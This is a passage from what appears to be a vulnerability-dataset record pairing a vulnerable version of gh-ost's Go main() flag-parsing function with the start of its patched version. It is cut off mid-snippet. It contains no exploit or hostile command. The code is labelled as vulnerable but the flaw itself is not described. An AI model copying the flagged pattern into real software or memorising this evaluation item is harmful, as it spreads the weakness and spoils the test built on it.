required to process the data safely and\n correctly."}}, "repo": "https://github.com/github/gh-ost", "patch_url": ["https://github.com/github/gh-ost/commit/a91ab042de013cfd8fbb633763438932d9080d8f"], "programing_language": "Go", "vul_func": [{"id": "vul_go_183_1", "commit": "1460aa1", "file_path": "go/cmd/gh-ost/main.go", "start_line": 47, "end_line": 300, "snippet": "func main() {\n\tmigrationContext := base.NewMigrationContext()\n\tflag.StringVar(&migrationContext.InspectorConnectionConfig.Key.Hostname, \"host\", \"127.0.0.1\", \"MySQL hostname (preferably a replica, not the master)\")\n\tflag.StringVar(&migrationContext.AssumeMasterHostname, \"assume-master-host\", \"\", \"(optional) explicitly tell gh-ost the identity of the master. Format: some.host.com[:port] This is useful in master-master setups where you wish to pick an explicit master, or in a tungsten-replicator where gh-ost is unable to determine the master\")\n\tflag.IntVar(&migrationContext.InspectorConnectionConfig.Key.Port, \"port\", 3306, \"MySQL port (preferably a replica, not the master)\")\n\tflag.Float64Var(&migrationContext.InspectorConnectionConfig.Timeout, \"mysql-timeout\", 0.0, \"Connect, read and write timeout for MySQL\")\n\tflag.StringVar(&migrationContext.CliUser, \"user\", \"\", \"MySQL user\")\n\tflag.StringVar(&migrationContext.CliPassword, \"password\", \"\", \"MySQL password\")\n\tflag.StringVar(&migrationContext.CliMasterUser, \"master-user\", \"\", \"MySQL user on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.CliMasterPassword, \"master-password\", \"\", \"MySQL password on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.ConfigFile, \"conf\", \"\", \"Config file\")\n\taskPass := flag.Bool(\"ask-pass\", false, \"prompt for MySQL password\")\n\n\tflag.BoolVar(&migrationContext.UseTLS, \"ssl\", false, \"Enable SSL encrypted connections to MySQL hosts\")\n\tflag.StringVar(&migrationContext.TLSCACertificate, \"ssl-ca\", \"\", \"CA certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSCertificate, \"ssl-cert\", \"\", \"Certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSKey, \"ssl-key\", \"\", \"Key in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.BoolVar(&migrationContext.TLSAllowInsecure, \"ssl-allow-insecure\", false, \"Skips verification of MySQL hosts' certificate chain and host name. Requires --ssl\")\n\n\tflag.StringVar(&migrationContext.DatabaseName, \"database\", \"\", \"database name (mandatory)\")\n\tflag.StringVar(&migrationContext.OriginalTableName, \"table\", \"\", \"table name (mandatory)\")\n\tflag.StringVar(&migrationContext.AlterStatement, \"alter\", \"\", \"alter statement (mandatory)\")\n\tflag.BoolVar(&migrationContext.CountTableRows, \"exact-rowcount\", false, \"actually count table rows as opposed to estimate them (results in more accurate progress estimation)\")\n\tflag.BoolVar(&migrationContext.ConcurrentCountTableRows, \"concurrent-rowcount\", true, \"(with --exact-rowcount), when true (default): count rows after row-copy begins, concurrently, and adjust row estimate later on; when false: first count rows, then start row copy\")\n\tflag.BoolVar(&migrationContext.AllowedRunningOnMaster, \"allow-on-master\", false, \"allow this migration to run directly on master. Preferably it would run on a replica\")\n\tflag.BoolVar(&migrationContext.AllowedMasterMaster, \"allow-master-master\", false, \"explicitly allow running in a master-master setup\")\n\tflag.BoolVar(&migrationContext.NullableUniqueKeyAllowed, \"allow-nullable-unique-key\", false, \"allow gh-ost to migrate based on a unique key with nullable columns. As long as no NULL values exist, this should be OK. If NULL values exist in chosen key, data may be corrupted. Use at your own risk!\")\n\tflag.BoolVar(&migrationContext.ApproveRenamedColumns, \"approve-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag approves that gh-ost's interpretation is correct\")\n\tflag.BoolVar(&migrationContext.SkipRenamedColumns, \"skip-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag tells gh-ost to skip the renamed columns, i.e. to treat what gh-ost thinks are renamed columns as unrelated columns. NOTE: you may lose column data\")\n\tflag.BoolVar(&migrationContext.IsTungsten, \"tungsten\", false, \"explicitly let gh-ost know that you are running on a tungsten-replication based topology (you are likely to also provide --assume-master-host)\")\n\tflag.BoolVar(&migrationContext.DiscardForeignKeys, \"discard-foreign-keys\", false, \"DANGER! This flag will migrate a table that has foreign keys and will NOT create foreign keys on the ghost table, thus your altered table will have NO foreign keys. This is useful for intentional dropping of foreign keys\")\n\tflag.BoolVar(&migrationContext.SkipForeignKeyChecks, \"skip-foreign-key-checks\", false, \"set to 'true' when you know for certain there are no foreign keys on your table, and wish to skip the time it takes for gh-ost to verify that\")\n\tflag.BoolVar(&migrationContext.SkipStrictMode, \"skip-strict-mode\", false, \"explicitly tell gh-ost binlog applier not to enforce strict sql mode\")\n\tflag.BoolVar(&migrationContext.AliyunRDS, \"aliyun-rds\", false, \"set to 'true' when you execute on Aliyun RDS.\")\n\tflag.BoolVar(&migrationContext.GoogleCloudPlatform, \"gcp\", false, \"set to 'true' when you execute on a 1st generation Google Cloud Platform (GCP).\")\n\tflag.BoolVar(&migrationContext.AzureMySQL, \"azure\", false, \"set to 'true' when you execute on Azure Database on MySQL.\")\n\n\texecuteFlag := flag.Bool(\"execute\", false, \"actually execute the alter & migrate the table. Default is noop: do some tests and exit\")\n\tflag.BoolVar(&migrationContext.TestOnReplica, \"test-on-replica\", false, \"Have the migration run on a replica, not on the master. At the end of migration replication is stopped, and tables are swapped and immediately swap-revert. Replication remains stopped and you can compare the two tables for building trust\")\n\tflag.BoolVar(&migrationContext.TestOnReplicaSkipReplicaStop, \"test-on-replica-skip-replica-stop\", false, \"When --test-on-replica is enabled, do not issue commands stop replication (requires --test-on-replica)\")\n\tflag.BoolVar(&migrationContext.MigrateOnReplica, \"migrate-on-replica\", false, \"Have the migration run on a replica, not on the master. This will do the full migration on the replica including cut-over (as opposed to --test-on-replica)\")\n\n\tflag.BoolVar(&migrationContext.OkToDropTable, \"ok-to-drop-table\", false, \"Shall the tool drop the old table at end of operation. DROPping tables can be a long locking operation, which is why I'm not doing it by default. I'm an online tool, yes?\")\n\tflag.BoolVar(&migrationContext.InitiallyDropOldTable, \"initially-drop-old-table\", false, \"Drop a possibly existing OLD table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.InitiallyDropGhostTable, \"initially-drop-ghost-table\", false, \"Drop a possibly existing Ghost table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.TimestampOldTable, \"timestamp-old-table\", false, \"Use a timestamp in old table name. This makes old table names unique and non conflicting cross migrations\")\n\tcutOver := flag.String(\"cut-over\", \"atomic\", \"choose cut-over type (default|atomic, two-step)\")\n\tflag.BoolVar(&migrationContext.ForceNamedCutOverCommand, \"force-named-cut-over\", false, \"When true, the 'unpostpone|cut-over' interactive command must name the migrated table\")\n\tflag.BoolVar(&migrationContext.ForceNamedPanicCommand, \"force-named-panic\", false, \"When true, the 'panic' interactive command must name the migrated table\")\n\n\tflag.BoolVar(&migrationContext.SwitchToRowBinlogFormat, \"switch-to-rbr\", false, \"let this tool automatically switch binary log format to 'ROW' on the replica, if needed. The format will NOT be switched back. I'm too scared to do that, and wish to protect you if you happen to execute another migration while this one is running\")\n\tflag.BoolVar(&migrationContext.AssumeRBR, \"assume-rbr\", false, \"set to 'true' when you know for certain your server uses 'ROW' binlog_format. gh-ost is unable to tell, event after reading binlog_format, whether the replication process does indeed use 'ROW', and restarts replication to be certain RBR setting is applied. Such operation requires SUPER privileges which you might not have. Setting this flag avoids restarting replication and you can proceed to use gh-ost without SUPER privileges\")\n\tflag.BoolVar(&migrationContext.CutOverExponentialBackoff, \"cut-over-exponential-backoff\", false, \"Wait exponentially longer intervals between failed cut-over attempts. Wait intervals obey a maximum configurable with 'exponential-backoff-max-interval').\")\n\texponentialBackoffMaxInterval := flag.Int64(\"exponential-backoff-max-interval\", 64, \"Maximum number of seconds to wait between attempts when performing various operations with exponential backoff.\")\n\tchunkSize := flag.Int64(\"chunk-size\", 1000, \"amount of rows to handle in each iteration (allowed range: 100-100,000)\")\n\tdmlBatchSize := flag.Int64(\"dml-batch-size\", 10, \"batch size for DML events to apply in a single transaction (range 1-100)\")\n\tdefaultRetries := flag.Int64(\"default-retries\", 60, \"Default number of retries for various operations before panicking\")\n\tcutOverLockTimeoutSeconds := flag.Int64(\"cut-over-lock-timeout-seconds\", 3, \"Max number of seconds to hold locks on tables while attempting to cut-over (retry attempted when lock exceeds timeout)\")\n\tniceRatio := flag.Float64(\"nice-ratio\", 0, \"force being 'nice', imply sleep time per chunk time; range: [0.0..100.0]. Example values: 0 is aggressive. 1: for every 1ms spent copying rows, sleep additional 1ms (effectively doubling runtime); 0.7: for every 10ms spend in a rowcopy chunk, spend 7ms sleeping immediately after\")\n\n\tmaxLagMillis := flag.Int64(\"max-lag-millis\", 1500, \"replication lag at which to throttle operation\")\n\treplicationLagQuery := flag.String(\"replication-lag-query\", \"\", \"Deprecated. gh-ost uses an internal, subsecond resolution query\")\n\tthrottleControlReplicas := flag.String(\"throttle-control-replicas\", \"\", \"List of replicas on which to check for lag; comma delimited. Example: myhost1.com:3306,myhost2.com,myhost3.com:3307\")\n\tthrottleQuery := flag.String(\"throttle-query\", \"\", \"when given, issued (every second) to check if operation should throttle. Expecting to return zero for no-throttle, >0 for throttle. Query is issued on the migrated server. Make sure this query is lightweight\")\n\tthrottleHTTP := flag.String(\"throttle-http\", \"\", \"when given, gh-ost checks given URL via HEAD request; any response code other than 200 (OK) causes throttling; make sure it has low latency response\")\n\tignoreHTTPErrors := flag.Bool(\"ignore-http-errors\", false, \"ignore HTTP connection errors during throttle check\")\n\theartbeatIntervalMillis := flag.Int64(\"heartbeat-interval-millis\", 100, \"how frequently would gh-ost inject a heartbeat value\")\n\tflag.StringVar(&migrationContext.ThrottleFlagFile, \"throttle-flag-file\", \"\", \"operation pauses when this file exists; hint: use a file that is specific to the table being altered\")\n\tflag.StringVar(&migrationContext.ThrottleAdditionalFlagFile, \"throttle-additional-flag-file\", \"/tmp/gh-ost.throttle\", \"operation pauses when this file exists; hint: keep default, use for throttling multiple gh-ost operations\")\n\tflag.StringVar(&migrationContext.PostponeCutOverFlagFile, \"postpone-cut-over-flag-file\", \"\", \"while this file exists, migration will postpone the final stage of swapping tables, and will keep on syncing the ghost table. Cut-over/swapping would be ready to perform the moment the file is deleted.\")\n\tflag.StringVar(&migrationContext.PanicFlagFile, \"panic-flag-file\", \"\", \"when this file is created, gh-ost will immediately terminate, without cleanup\")\n\n\tflag.BoolVar(&migrationContext.DropServeSocket, \"initially-drop-socket-file\", false, \"Should gh-ost forcibly delete an existing socket file. Be careful: this might drop the socket file of a running migration!\")\n\tflag.StringVar(&migrationContext.ServeSocketFile, \"serve-socket-file\", \"\", \"Unix socket file to serve on. Default: auto-determined and advertised upon startup\")\n\tflag.Int64Var(&migrationContext.ServeTCPPort, \"serve-tcp-port\", 0, \"TCP port to serve on. Default: disabled\")\n\n\tflag.StringVar(&migrationContext.HooksPath, \"hooks-path\", \"\", \"directory where hook files are found (default: empty, ie. hooks disabled). Hook files found on this path, and conforming to hook naming conventions will be executed\")\n\tflag.StringVar(&migrationContext.HooksHintMessage, \"hooks-hint\", \"\", \"arbitrary message to be injected to hooks via GH_OST_HOOKS_HINT, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintOwner, \"hooks-hint-owner\", \"\", \"arbitrary name of owner to be injected to hooks via GH_OST_HOOKS_HINT_OWNER, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintToken, \"hooks-hint-token\", \"\", \"arbitrary token to be injected to hooks via GH_OST_HOOKS_HINT_TOKEN, for your convenience\")\n\n\tflag.UintVar(&migrationContext.ReplicaServerId, \"replica-server-id\", 99999, \"server id used by gh-ost process. Default: 99999\")\n\n\tmaxLoad := flag.String(\"max-load\", \"\", \"Comma delimited status-name=threshold. e.g: 'Threads_running=100,Threads_connected=500'. When status exceeds threshold, app throttles writes\")\n\tcriticalLoad := flag.String(\"critical-load\", \"\", \"Comma delimited status-name=threshold, same format as --max-load. When status exceeds threshold, app panics and quits\")\n\tflag.Int64Var(&migrationContext.CriticalLoadIntervalMilliseconds, \"critical-load-interval-millis\", 0, \"When 0, migration immediately bails out upon meeting critical-load. When non-zero, a second check is done after given interval, and migration only bails out if 2nd check still meets critical load\")\n\tflag.Int64Var(&migrationContext.CriticalLoadHibernateSeconds, \"critical-load-hibernate-seconds\", 0, \"When non-zero, critical-load does not panic and bail out; instead, gh-ost goes into hibernation for the specified duration. It will not read/write anything from/to any server\")\n\tquiet := flag.Bool(\"quiet\", false, \"quiet\")\n\tverbose := flag.Bool(\"verbose\", false, \"verbose\")\n\tdebug := flag.Bool(\"debug\", false, \"debug mode (very verbose)\")\n\tstack := flag.Bool(\"stack\", false, \"add stack trace upon error\")\n\thelp := flag.Bool(\"help\", false, \"Display usage\")\n\tversion := flag.Bool(\"version\", false, \"Print version & exit\")\n\tcheckFlag := flag.Bool(\"check-flag\", false, \"Check if another flag exists/supported. This allows for cross-version scripting. Exits with 0 when all additional provided flags exist, nonzero otherwise. You must provide (dummy) values for flags that require a value. Example: gh-ost --check-flag --cut-over-lock-timeout-seconds --nice-ratio 0\")\n\tflag.StringVar(&migrationContext.ForceTmpTableName, \"force-table-names\", \"\", \"table name prefix to be used on the temporary tables\")\n\tflag.CommandLine.SetOutput(os.Stdout)\n\n\tflag.Parse()\n\n\tif *checkFlag {\n\t\treturn\n\t}\n\tif *help {\n\t\tfmt.Fprintf(os.Stdout, \"Usage of gh-ost:\\n\")\n\t\tflag.PrintDefaults()\n\t\treturn\n\t}\n\tif *version {\n\t\tappVersion := AppVersion\n\t\tif appVersion == \"\" {\n\t\t\tappVersion = \"unversioned\"\n\t\t}\n\t\tfmt.Println(appVersion)\n\t\treturn\n\t}\n\n\tmigrationContext.Log.SetLevel(log.ERROR)\n\tif *verbose {\n\t\tmigrationContext.Log.SetLevel(log.INFO)\n\t}\n\tif *debug {\n\t\tmigrationContext.Log.SetLevel(log.DEBUG)\n\t}\n\tif *stack {\n\t\tmigrationContext.Log.SetPrintStackTrace(*stack)\n\t}\n\tif *quiet {\n\t\t// Override!!\n\t\tmigrationContext.Log.SetLevel(log.ERROR)\n\t}\n\n\tif migrationContext.AlterStatement == \"\" {\n\t\tlog.Fatalf(\"--alter must be provided and statement must not be empty\")\n\t}\n\tparser := sql.NewParserFromAlterStatement(migrationContext.AlterStatement)\n\tmigrationContext.AlterStatementOptions = parser.GetAlterStatementOptions()\n\n\tif migrationContext.DatabaseName == \"\" {\n\t\tif parser.HasExplicitSchema() {\n\t\t\tmigrationContext.DatabaseName = parser.GetExplicitSchema()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--database must be provided and database name must not be empty, or --alter must specify database name\")\n\t\t}\n\t}\n\tif migrationContext.OriginalTableName == \"\" {\n\t\tif parser.HasExplicitTable() {\n\t\t\tmigrationContext.OriginalTableName = parser.GetExplicitTable()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--table must be provided and table name must not be empty, or --alter must specify table name\")\n\t\t}\n\t}\n\tmigrationContext.Noop = !(*executeFlag)\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.MigrateOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --migrate-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.MigrateOnReplica && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--migrate-on-replica and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.SwitchToRowBinlogFormat && migrationContext.AssumeRBR {\n\t\tmigrationContext.Log.Fatalf(\"--switch-to-rbr and --assume-rbr are mutually exclusive\")\n\t}\n\tif migrationContext.TestOnReplicaSkipReplicaStop {\n\t\tif !migrationContext.TestOnReplica {\n\t\t\tmigrationContext.Log.Fatalf(\"--test-on-replica-skip-replica-stop requires --test-on-replica to be enabled\")\n\t\t}\n\t\tmigrationContext.Log.Warning(\"--test-on-replica-skip-replica-stop enabled. We will not stop replication before cut-over. Ensure you have a plugin that does this.\")\n\t}\n\tif migrationContext.CliMasterUser != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-user requires --assume-master-host\")\n\t}\n\tif migrationContext.CliMasterPassword != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-password requires --assume-master-host\")\n\t}\n\tif migrationContext.TLSCACertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-ca requires --ssl\")\n\t}\n\tif migrationContext.TLSCertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-cert requires --ssl\")\n\t}\n\tif migrationContext.TLSKey != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-key requires --ssl\")\n\t}\n\tif migrationContext.TLSAllowInsecure && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-allow-insecure requires --ssl\")\n\t}\n\tif *replicationLagQuery != \"\" {\n\t\tmigrationContext.Log.Warningf(\"--replication-lag-query is deprecated\")\n\t}\n\n\tswitch *cutOver {\n\tcase \"atomic\", \"default\", \"\":\n\t\tmigrationContext.CutOverType = base.CutOverAtomic\n\tcase \"two-step\":\n\t\tmigrationContext.CutOverType = base.CutOverTwoStep\n\tdefault:\n\t\tmigrationContext.Log.Fatalf(\"Unknown cut-over: %s\", *cutOver)\n\t}\n\tif err := migrationContext.ReadConfigFile(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadThrottleControlReplicaKeys(*throttleControlReplicas); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadMaxLoad(*maxLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadCriticalLoad(*criticalLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif migrationContext.ServeSocketFile == \"\" {\n\t\tmigrationContext.ServeSocketFile = fmt.Sprintf(\"/tmp/gh-ost.%s.%s.sock\", migrationContext.DatabaseName, migrationContext.OriginalTableName)\n\t}\n\tif *askPass {\n\t\tfmt.Println(\"Password:\")\n\t\tbytePassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\t\tif err != nil {\n\t\t\tmigrationContext.Log.Fatale(err)\n\t\t}\n\t\tmigrationContext.CliPassword = string(bytePassword)\n\t}\n\tmigrationContext.SetHeartbeatIntervalMilliseconds(*heartbeatIntervalMillis)\n\tmigrationContext.SetNiceRatio(*niceRatio)\n\tmigrationContext.SetChunkSize(*chunkSize)\n\tmigrationContext.SetDMLBatchSize(*dmlBatchSize)\n\tmigrationContext.SetMaxLagMillisecondsThrottleThreshold(*maxLagMillis)\n\tmigrationContext.SetThrottleQuery(*throttleQuery)\n\tmigrationContext.SetThrottleHTTP(*throttleHTTP)\n\tmigrationContext.SetIgnoreHTTPErrors(*ignoreHTTPErrors)\n\tmigrationContext.SetDefaultNumRetries(*defaultRetries)\n\tmigrationContext.ApplyCredentials()\n\tif err := migrationContext.SetupTLS(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.SetCutOverLockTimeoutSeconds(*cutOverLockTimeoutSeconds); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\tif err := migrationContext.SetExponentialBackoffMaxInterval(*exponentialBackoffMaxInterval); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\n\tlog.Infof(\"starting gh-ost %+v\", AppVersion)\n\tacceptSignals(migrationContext)\n\n\tmigrator := logic.NewMigrator(migrationContext)\n\terr := migrator.Migrate()\n\tif err != nil {\n\t\tmigrator.ExecOnFailureHook()\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tfmt.Fprintf(os.Stdout, \"# Done\\n\")\n}"}], "fix_func": [{"id": "fix_go_183_1", "commit": "a91ab04", "file_path": "go/cmd/gh-ost/main.go", "start_line": 48, "end_line": 306, "snippet": "func main() {\n\tmigrationContext := base.NewMigrationContext()\n\tflag.StringVar(&migrationContext.InspectorConnectionConfig.Key.Hostname, \"host\", \"127.0.0.1\", \"MySQL hostname (preferably a replica, not the master)\")\n\tflag.StringVar(&migrationContext.AssumeMasterHostname, \"assume-master-host\", \"\", \"(optional) explicitly tell gh-ost the identity of the master. Format: some.host.com[:port] This is useful in master-master setups where you wish to pick an explicit master, or in a tungsten-replicator where gh-ost is unable to determine the master\")\n\tflag.IntVar(&migrationContext.InspectorConnectionConfig.Key.Port, \"port\", 3306, \"MySQL port (preferably a replica, not the master)\")\n\tflag.Float64Var(&migrationContext.InspectorConnectionConfig.Timeout, \"mysql-timeout\", 0.0, \"Connect, read and write timeout for MySQL\")\n\tflag.StringVar(&migrationContext.CliUser, \"user\", \"\", \"MySQL user\")\n\tflag.StringVar(&migrationContext.CliPassword, \"password\", \"\", \"MySQL password\")\n\tflag.StringVar(&migrationContext.CliMasterUser, \"master-user\", \"\", \"MySQL user on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.CliMasterPassword, \"master-password\", \"\", \"MySQL password on master, if different from that on replica. Requires --assume-master-host\")\n\tflag.StringVar(&migrationContext.ConfigFile, \"conf\", \"\", \"Config file\")\n\taskPass := flag.Bool(\"ask-pass\", false, \"prompt for MySQL password\")\n\n\tflag.BoolVar(&migrationContext.UseTLS, \"ssl\", false, \"Enable SSL encrypted connections to MySQL hosts\")\n\tflag.StringVar(&migrationContext.TLSCACertificate, \"ssl-ca\", \"\", \"CA certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSCertificate, \"ssl-cert\", \"\", \"Certificate in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.StringVar(&migrationContext.TLSKey, \"ssl-key\", \"\", \"Key in PEM format for TLS connections to MySQL hosts. Requires --ssl\")\n\tflag.BoolVar(&migrationContext.TLSAllowInsecure, \"ssl-allow-insecure\", false, \"Skips verification of MySQL hosts' certificate chain and host name. Requires --ssl\")\n\n\tflag.StringVar(&migrationContext.DatabaseName, \"database\", \"\", \"database name (mandatory)\")\n\tflag.StringVar(&migrationContext.OriginalTableName, \"table\", \"\", \"table name (mandatory)\")\n\tflag.StringVar(&migrationContext.AlterStatement, \"alter\", \"\", \"alter statement (mandatory)\")\n\tflag.BoolVar(&migrationContext.CountTableRows, \"exact-rowcount\", false, \"actually count table rows as opposed to estimate them (results in more accurate progress estimation)\")\n\tflag.BoolVar(&migrationContext.ConcurrentCountTableRows, \"concurrent-rowcount\", true, \"(with --exact-rowcount), when true (default): count rows after row-copy begins, concurrently, and adjust row estimate later on; when false: first count rows, then start row copy\")\n\tflag.BoolVar(&migrationContext.AllowedRunningOnMaster, \"allow-on-master\", false, \"allow this migration to run directly on master. Preferably it would run on a replica\")\n\tflag.BoolVar(&migrationContext.AllowedMasterMaster, \"allow-master-master\", false, \"explicitly allow running in a master-master setup\")\n\tflag.BoolVar(&migrationContext.NullableUniqueKeyAllowed, \"allow-nullable-unique-key\", false, \"allow gh-ost to migrate based on a unique key with nullable columns. As long as no NULL values exist, this should be OK. If NULL values exist in chosen key, data may be corrupted. Use at your own risk!\")\n\tflag.BoolVar(&migrationContext.ApproveRenamedColumns, \"approve-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag approves that gh-ost's interpretation is correct\")\n\tflag.BoolVar(&migrationContext.SkipRenamedColumns, \"skip-renamed-columns\", false, \"in case your `ALTER` statement renames columns, gh-ost will note that and offer its interpretation of the rename. By default gh-ost does not proceed to execute. This flag tells gh-ost to skip the renamed columns, i.e. to treat what gh-ost thinks are renamed columns as unrelated columns. NOTE: you may lose column data\")\n\tflag.BoolVar(&migrationContext.IsTungsten, \"tungsten\", false, \"explicitly let gh-ost know that you are running on a tungsten-replication based topology (you are likely to also provide --assume-master-host)\")\n\tflag.BoolVar(&migrationContext.DiscardForeignKeys, \"discard-foreign-keys\", false, \"DANGER! This flag will migrate a table that has foreign keys and will NOT create foreign keys on the ghost table, thus your altered table will have NO foreign keys. This is useful for intentional dropping of foreign keys\")\n\tflag.BoolVar(&migrationContext.SkipForeignKeyChecks, \"skip-foreign-key-checks\", false, \"set to 'true' when you know for certain there are no foreign keys on your table, and wish to skip the time it takes for gh-ost to verify that\")\n\tflag.BoolVar(&migrationContext.SkipStrictMode, \"skip-strict-mode\", false, \"explicitly tell gh-ost binlog applier not to enforce strict sql mode\")\n\tflag.BoolVar(&migrationContext.AliyunRDS, \"aliyun-rds\", false, \"set to 'true' when you execute on Aliyun RDS.\")\n\tflag.BoolVar(&migrationContext.GoogleCloudPlatform, \"gcp\", false, \"set to 'true' when you execute on a 1st generation Google Cloud Platform (GCP).\")\n\tflag.BoolVar(&migrationContext.AzureMySQL, \"azure\", false, \"set to 'true' when you execute on Azure Database on MySQL.\")\n\n\texecuteFlag := flag.Bool(\"execute\", false, \"actually execute the alter & migrate the table. Default is noop: do some tests and exit\")\n\tflag.BoolVar(&migrationContext.TestOnReplica, \"test-on-replica\", false, \"Have the migration run on a replica, not on the master. At the end of migration replication is stopped, and tables are swapped and immediately swap-revert. Replication remains stopped and you can compare the two tables for building trust\")\n\tflag.BoolVar(&migrationContext.TestOnReplicaSkipReplicaStop, \"test-on-replica-skip-replica-stop\", false, \"When --test-on-replica is enabled, do not issue commands stop replication (requires --test-on-replica)\")\n\tflag.BoolVar(&migrationContext.MigrateOnReplica, \"migrate-on-replica\", false, \"Have the migration run on a replica, not on the master. This will do the full migration on the replica including cut-over (as opposed to --test-on-replica)\")\n\n\tflag.BoolVar(&migrationContext.OkToDropTable, \"ok-to-drop-table\", false, \"Shall the tool drop the old table at end of operation. DROPping tables can be a long locking operation, which is why I'm not doing it by default. I'm an online tool, yes?\")\n\tflag.BoolVar(&migrationContext.InitiallyDropOldTable, \"initially-drop-old-table\", false, \"Drop a possibly existing OLD table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.InitiallyDropGhostTable, \"initially-drop-ghost-table\", false, \"Drop a possibly existing Ghost table (remains from a previous run?) before beginning operation. Default is to panic and abort if such table exists\")\n\tflag.BoolVar(&migrationContext.TimestampOldTable, \"timestamp-old-table\", false, \"Use a timestamp in old table name. This makes old table names unique and non conflicting cross migrations\")\n\tcutOver := flag.String(\"cut-over\", \"atomic\", \"choose cut-over type (default|atomic, two-step)\")\n\tflag.BoolVar(&migrationContext.ForceNamedCutOverCommand, \"force-named-cut-over\", false, \"When true, the 'unpostpone|cut-over' interactive command must name the migrated table\")\n\tflag.BoolVar(&migrationContext.ForceNamedPanicCommand, \"force-named-panic\", false, \"When true, the 'panic' interactive command must name the migrated table\")\n\n\tflag.BoolVar(&migrationContext.SwitchToRowBinlogFormat, \"switch-to-rbr\", false, \"let this tool automatically switch binary log format to 'ROW' on the replica, if needed. The format will NOT be switched back. I'm too scared to do that, and wish to protect you if you happen to execute another migration while this one is running\")\n\tflag.BoolVar(&migrationContext.AssumeRBR, \"assume-rbr\", false, \"set to 'true' when you know for certain your server uses 'ROW' binlog_format. gh-ost is unable to tell, event after reading binlog_format, whether the replication process does indeed use 'ROW', and restarts replication to be certain RBR setting is applied. Such operation requires SUPER privileges which you might not have. Setting this flag avoids restarting replication and you can proceed to use gh-ost without SUPER privileges\")\n\tflag.BoolVar(&migrationContext.CutOverExponentialBackoff, \"cut-over-exponential-backoff\", false, \"Wait exponentially longer intervals between failed cut-over attempts. Wait intervals obey a maximum configurable with 'exponential-backoff-max-interval').\")\n\texponentialBackoffMaxInterval := flag.Int64(\"exponential-backoff-max-interval\", 64, \"Maximum number of seconds to wait between attempts when performing various operations with exponential backoff.\")\n\tchunkSize := flag.Int64(\"chunk-size\", 1000, \"amount of rows to handle in each iteration (allowed range: 100-100,000)\")\n\tdmlBatchSize := flag.Int64(\"dml-batch-size\", 10, \"batch size for DML events to apply in a single transaction (range 1-100)\")\n\tdefaultRetries := flag.Int64(\"default-retries\", 60, \"Default number of retries for various operations before panicking\")\n\tcutOverLockTimeoutSeconds := flag.Int64(\"cut-over-lock-timeout-seconds\", 3, \"Max number of seconds to hold locks on tables while attempting to cut-over (retry attempted when lock exceeds timeout)\")\n\tniceRatio := flag.Float64(\"nice-ratio\", 0, \"force being 'nice', imply sleep time per chunk time; range: [0.0..100.0]. Example values: 0 is aggressive. 1: for every 1ms spent copying rows, sleep additional 1ms (effectively doubling runtime); 0.7: for every 10ms spend in a rowcopy chunk, spend 7ms sleeping immediately after\")\n\n\tmaxLagMillis := flag.Int64(\"max-lag-millis\", 1500, \"replication lag at which to throttle operation\")\n\treplicationLagQuery := flag.String(\"replication-lag-query\", \"\", \"Deprecated. gh-ost uses an internal, subsecond resolution query\")\n\tthrottleControlReplicas := flag.String(\"throttle-control-replicas\", \"\", \"List of replicas on which to check for lag; comma delimited. Example: myhost1.com:3306,myhost2.com,myhost3.com:3307\")\n\tthrottleQuery := flag.String(\"throttle-query\", \"\", \"when given, issued (every second) to check if operation should throttle. Expecting to return zero for no-throttle, >0 for throttle. Query is issued on the migrated server. Make sure 